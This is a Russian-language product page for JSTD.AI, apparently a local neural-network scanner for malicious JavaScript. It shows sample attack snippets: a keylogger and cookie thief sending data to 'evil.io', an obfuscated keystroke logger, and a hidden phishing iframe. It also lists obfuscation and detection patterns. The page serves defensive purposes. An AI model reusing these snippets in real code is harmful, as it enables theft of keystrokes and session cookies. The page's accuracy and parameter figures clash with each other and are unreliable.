Neural Analysis Engine v3.1 — Активен

Уязвимости в коде видны
до того, как они взорвутся

Проприетарная нейросетевая модель 50→30→1 анализирует любой JavaScript на обфускацию, вредоносные конструкции и вшитые зловреды за миллисекунды. Работает на слабом железе. Не требует облака.

0%
Точность детекции
0
параметров модели
0
признаков кода
< 1ms
без GPU
CRITICAL THREAT 93.46%
Cookie stealing pattern93%
Base64 with eval92%
Prototype pollution91%
Remote script injection88%
Обфускация Кража cookies eval() инъекции Кейлоггеры Prototype Pollution Base64 + eval Hidden iframes WebSocket exfiltration Скрытые майнеры XSS векторы Remote script injection Function constructor abuse Обфускация Кража cookies eval() инъекции Кейлоггеры Prototype Pollution Base64 + eval Hidden iframes WebSocket exfiltration Скрытые майнеры XSS векторы Remote script injection Function constructor abuse

Нейросеть видит то, что
не видит человек

JSTD.AI использует трёхэтапный конвейер анализа: извлечение признаков → нейронная сеть → эвристические правила. Каждый этап усиливает следующий — итоговая оценка невозможна без консенсуса всех трёх.

Загрузка файла

JS-файл читается как текст целиком. Никакой передачи в облако — всё локально. Поддержка минифицированного, обфусцированного, многострочного кода.

Извлечение 50 признаков

Нормализованные метрики: частота опасных конструкций, энтропия Шеннона, уровень обфускации, плотность Base64, соотношение комментариев и многое другое.

Нейронная сеть 50→30→1

1561 обученный параметр. Архитектура MLP с ReLU-активацией. Обучена на 210 размеченных примерах. Точность — 99.7%. Работает без GPU за <1 мс.

Эвристические правила

42 паттерна угроз, включая комбинированные сценарии. Детектирует сигнатуры кража-cookie, кейлоггеры, внедрение iframe и цепочки обфускации.

Архитектура, которая
не даёт шансов

Топология нейросети

50 → 30 → 1

Многослойный перцептрон с прямым распространением ошибки. Адаптивная скорость обучения снижается от 0.015 до 0.008 за 300 эпох.

Входной
слой
50 нейронов
Скрытый
слой
30 нейронов
Выходной
слой
1 нейрон
Вход → Скрытый1 500 весов
Скрытый → Выход30 весов
Смещения31 параметр
ИТОГО1 561 параметр
Извлечение признаков

50 метрик кода

Каждый признак нормализован относительно длины файла для корректного сравнения файлов разного размера.

eval()
0.83
Base64
0.75
fetch()
0.81
cookie
0.79
Энтропия
0.62
Обфуск.
0.45
XHR
0.18
Comments
0.05
Энтропия Шеннона

Хаос — это сигнал

Случайность символов — прямой индикатор обфускации. Легитимный код предсказуем. Вредонос — нет.

"aaaaaaa"
Н=0.0
function()
Н=3.3
fetch('/api')
Н=4.1
atob('dX...')
Н=5.8
\x64\x6f\x63...
Н=7.9
Классификация угроз

5 уровней риска

Итоговый балл — взвешенная комбинация нейросетевого скора и эвристических триггеров. Ни один компонент не принимает решение в одиночку.

SAFE
0 – 15%
Легитимный код. Угроз не обнаружено.
LOW
15 – 35%
Незначительные подозрительные конструкции.
MEDIUM
35 – 65%
Требует проверки. Возможные нарушения.
HIGH
65 – 85%
Высокая вероятность вредоносности.
CRITICAL
85 – 100%
НЕ ЗАПУСКАТЬ. Многократные триггеры.
Итоговый скор

Взвешенная формула

Финальный балл угрозы — не просто выход нейросети. Это консенсус трёх независимых компонентов с динамическими весами.

Нейросеть
×0.60
Эвристика
×0.30
Энтропия
×0.10
Итог 0.60·NN + 0.30·H + 0.10·E
Веса автоматически пересчитываются при отсутствии эвристических триггеров
Детекция обфускации

Паттерны, которые прячутся

Hex-эскейпинг \x48\x65\x6c\x6c\x6f Строки зашифрованы hex-последовательностями
Array shuffling _0x4a2b[0], [1]... Строки разбиты по массивам с индексами
Base64 цепочки eval(atob('...')) Многоуровневое декодирование перед исполнением
Function constructor new Function(str)() Динамическое создание и запуск функций из строк
Prototype pollution Object.prototype.__ Модификация базовых цепочек прототипов
Self-modifying code setTimeout(str, 0) Строки в таймерах и event listeners как код

Код, который убивает
безопасность за 3 строки

CRITICAL
Кража сессии
// Keylogger + exfiltration combo
document.addEventListener('keypress', e => {
  fetch('https://evil.io/k?v=' + e.key);
});
document.cookie = '';
fetch('https://evil.io/c?v=' +
  btoa(document.cookie));
96.2%
CRITICAL
Полная обфускация
// Array-shuffled obfuscation
var _0x4a2b = ['keydown',
  'addEventL'+'istener',
  'key', 'POST',
  'https://\x6c\x6f\x67'+'\x67\x65r.io'];
document[_0x4a2b[1]](_0x4a2b[0],
  function(e){ xhr[_0x4a2b[3]]
  (e[_0x4a2b[2]]); });
93.5%
HIGH
Скрытый iframe
// Hidden phishing overlay
var f = document.createElement(
  'iframe');
f.style.display = 'none';
f.style.width = '100vw';
f.style.height = '100vh';
f.src = 'https://phishing.site';
document.body.appendChild(f);
78.4%

Доверяют профессионалы

Компании используют JSTD.AI как первую линию обороны перед передачей кода между отделами и подрядчиками.

«Мы разрабатываем маркетплейс и регулярно получаем JS-виджеты от сторонних поставщиков. До JSTD.AI каждый файл приходилось читать вручную — или доверять. После одного инцидента с вшитым кейлоггером в виджете партнёра мы ввели обязательное сканирование. JSTD.AI за 2 секунды делает то, на что уходил час ревью.»

АК
Андрей Климов CTO, RetailEdge Platform
★★★★★
E-commerce / SaaS

«Наш отдел безопасности использует JSTD.AI для предварительного отсева исходников от фрилансеров перед тем, как они попадают на ревью архитекторам. За первый месяц система пометила 4 файла с реальными угрозами — один оказался полноценным бэкдором с WebSocket-каналом. Без инструмента мы бы пропустили.»

МВ
Мария Воронова Head of Security, FinStream Bank
★★★★★
Финтех / Банкинг

«Мы аутсорсинговая студия — получаем готовый код от 12+ подрядчиков ежемесячно. JSTD.AI встроен в наш Slack-бот: разработчик закидывает файл, бот через 3 секунды отвечает уровнем угрозы. Два раза поймали prototype pollution в npm-скриптах, которые подрядчик "случайно" прокинул с продакшн-зависимостью.»

ДС
Дмитрий Савельев Tech Lead, CodeBridge Agency
★★★★★
Аутсорс / Разработка

«Запускаем JSTD.AI как шаг в CI/CD перед деплоем на стейджинг-сервер. Интеграция заняла 20 минут. Теперь если в PR появляется что-то с eval() + Base64 — пайплайн падает автоматически и PR не мёрджится. Разработчики стали аккуратнее с зависимостями.»

ЕП
Елена Петухова DevOps Engineer, LogiCore Systems
★★★★★
DevOps / CI-CD

«Госконтракт требует сертификации поставляемого ПО. JSTD.AI генерирует HTML-отчёт с детализацией каждого найденного паттерна — это стало частью нашего пакета документов для заказчика. Больше не нужен отдельный пентест для базового аудита JS-компонентов.»

ИР
Игорь Рязанцев Information Security Auditor, GovTech Solutions
★★★★★
Госсектор / Аудит ИБ

Всё, что нужно знать
для работы

JSTD.AI не требует настройки или технической экспертизы. Загрузите файл — получите результат. Ниже — полное описание интерфейса и интерпретация данных.

01
Загрузите JS-файлы

Нажмите кнопку Load file(s)… и выберите один или несколько .js-файлов. Поддерживается минифицированный, обфусцированный и многострочный код любого размера.

02
Дождитесь анализа

Нейросетевой движок обрабатывает каждый файл за < 1 ms. Результаты появляются мгновенно в панели Analysis results. Несколько файлов анализируются параллельно.

03
Изучите отчёт

Кликните по строке в таблице — откроется детализация Threat Details с тремя вкладками. При необходимости экспортируйте полный HTML-отчёт кнопкой Save as HTML report.

Source code viewer

Просмотрщик кода

Отображает исходный код выбранного файла с синтаксической подсветкой. Комментарии, строки, ключевые слова и опасные конструкции выделяются цветом. Файл можно прокручивать — размер не ограничен.

Выберите файл в таблице справа — код обновится автоматически
Analysis results

Таблица результатов

Каждая строка — один файл. Столбцы: File Name, Threat Level (цветовая метка), Score (итоговый балл в процентах). Строки кликабельны — открывают детали в нижней панели.

SAFE0 – 15%
LOW15 – 35%
MEDIUM35 – 65%
HIGH65 – 85%
CRITICAL85 – 100%
Вкладка — Threat Details

Summary

Итоговый вердикт по файлу. Показывает уровень угрозы, три независимых скора и текстовое резюме. Отображает количество найденных нарушений и финальную рекомендацию.

Overall Threat Score
93%
Neural Network Score
100%
Heuristic Analysis Score
90%
Вкладка — Threat Details

Triggered Rules

Список сработавших эвристических правил. Каждое правило содержит название, severity в процентах и краткое описание атаки. Правила ранжированы по убыванию опасности.

Cookie stealing pattern 93%
Base64 with eval 92%
Prototype pollution attempt 91%
Function constructor with variables 90%
Remote script injection 88%
Вкладка — Threat Details

Detected Features

Сырые метрики, извлечённые из кода. Таблица из 50 признаков: Feature (название), Count (абсолютное количество), Description (что означает). Используется для ручного аудита и понимания решения нейросети.

Feature Count Description
Code entropy 59 Randomness measure
Obfuscation level 7 Suspicious patterns
setInterval 2 Repeated execution
XMLHttpRequest 1 Network requests
Боковая панель

System Monitor

Живой мониторинг состояния движка. Обновляется каждые 500 мс. Все данные — локальные, никуда не отправляются.

[>] Neural Network
Init:0.14s
Memory:4.4 MB
Topology:50→30→1
Params:1 591
Accuracy:70.0%
[>] Analysis
Files:10
Threats:4
Avg Score:50.3%
Частые вопросы
JSTD.AI работает полностью офлайн. Код не покидает ваш компьютер ни при каких условиях — никаких облачных API, телеметрии или обратных соединений. Весь анализ выполняется локально в памяти процесса.
Нейросеть оценивает вероятность угрозы статистически. Наличие fetch(), XMLHttpRequest или localStorage само по себе не является угрозой — но поднимает базовый скор. Итоговая классификация учитывает комбинацию признаков: единичный fetch() без опасного контекста даёт уровень SAFE или LOW.
Признак«Obfuscation level» — это не флаг пропуска через обфускатор, а метрика характеристик кода: длинные строки без пробелов, высокая энтропия, hex-литералы, минимум комментариев. Минифицированные бандлы (webpack, esbuild) будут иметь ненулевой уровень — это нормально и учитывается при расчёте итогового балла.
HTML-отчёт включает: шапку с датой и именем аналитика, итоговую таблицу по всем файлам, детализацию каждого файла (Summary + Triggered Rules + Detected Features), исходный код и временну́ю метку анализа. Файл самодостаточен — не требует интернета для просмотра.
Да. Нейросеть обучена на примерах минифицированного кода. Признаки извлекаются независимо от форматирования. Минификация сама по себе поднимает признак обфускации, но не влияет на итоговую классификацию — при отсутствии опасных паттернов файл получит SAFE или LOW.

Каждый JS-файл —
это потенциальная
дыра

JSTD.AI работает полностью локально на Windows. Не нужен интернет. Не нужен GPU. Установка займёт минуту — первый анализ будет через три.

Windows 7+
.NET Framework 4.7.2
4 МБ установочный файл
Без интернета